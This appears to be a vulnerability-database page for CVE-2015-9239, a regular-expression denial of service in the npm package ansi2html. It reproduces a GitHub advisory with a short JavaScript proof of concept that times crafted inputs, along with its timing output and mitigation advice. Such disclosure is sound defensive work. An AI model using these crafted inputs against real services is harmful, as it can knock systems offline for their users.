CVE-2015-9239
UNKNOWN
Published 2018-05-31T20:00:00Z
Actions:
Expert Analysis
Professional remediation guidance
Get tailored security recommendations from our analyst team for CVE-2015-9239. We'll provide specific mitigation strategies based on your environment and risk profile.
No CVSS data available
Description
ansi2html is vulnerable to regular expression denial of service (ReDoS) when certain types of user input is passed in.
Available Exploits
No exploits available for this CVE.
Related News
No news articles found for this CVE.
Affected Products
Affected Versions:
GitHub Security Advisories
Community-driven vulnerability intelligence from GitHub
Advisory Details
The `ansi2html` package is affected by a regular expression denial of service vulnerability when certain types of user input is passed in.
## Proof of concept
```
var ansi2html = require('ansi2html')
var start = process.hrtime();
ansi2html("[1111111111111111111111;0000000000000000000000");
console.log(process.hrtime(start));
start = process.hrtime();
ansi2html("[1111111111111111111111;00000000000000000000000");
console.log(process.hrtime(start));
start = process.hrtime();
ansi2html("[1111111111111111111111;000000000000000000000000");
console.log(process.hrtime(start));
start = process.hrtime();
ansi2html("[1111111111111111111111;0000000000000000000000000000");
console.log(process.hrtime(start));
```
Results of the above
```
00:29:53-adam_baldwin~/tmp$ node test
[ 0, 119615367 ]
[ 0, 149934565 ]
[ 0, 233325677 ]
[ 3, 46582479 ]
```
## Recommendation
At the time of this writing, February 2018, all versions of `ansi2html` remain vulnerable, and the package has not been updated for 4 years.
In order to use this package safely, it is necessary to avoid passing user input to the package, or to limit the size of the input string to a size with a parse time you find acceptable. Unfortunately, the match time grows at quite a small character count, so it is unlikely for it to both allow strings of a useful size while protecting against the denial of service attack.
In the case that user input of significant length must be parsed by ansi2html, the best mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are [multiple modules fitting this criteria available on npm.][available on npm](https://www.npmjs.com/search?q=ansi+html)
Affected Packages
npm
ansi2html
ECOSYSTEM:
≥0.0.0
CVSS Scoring
CVSS Score
7.5
References
Advisory provided by GitHub Security Advisory Database. Published: September 1, 2020, Modified: January 14, 2021
References
Published: 2018-05-31T20:00:00Z
Last Modified: 2024-09-16T19:36:41.294Z
Copied to clipboard!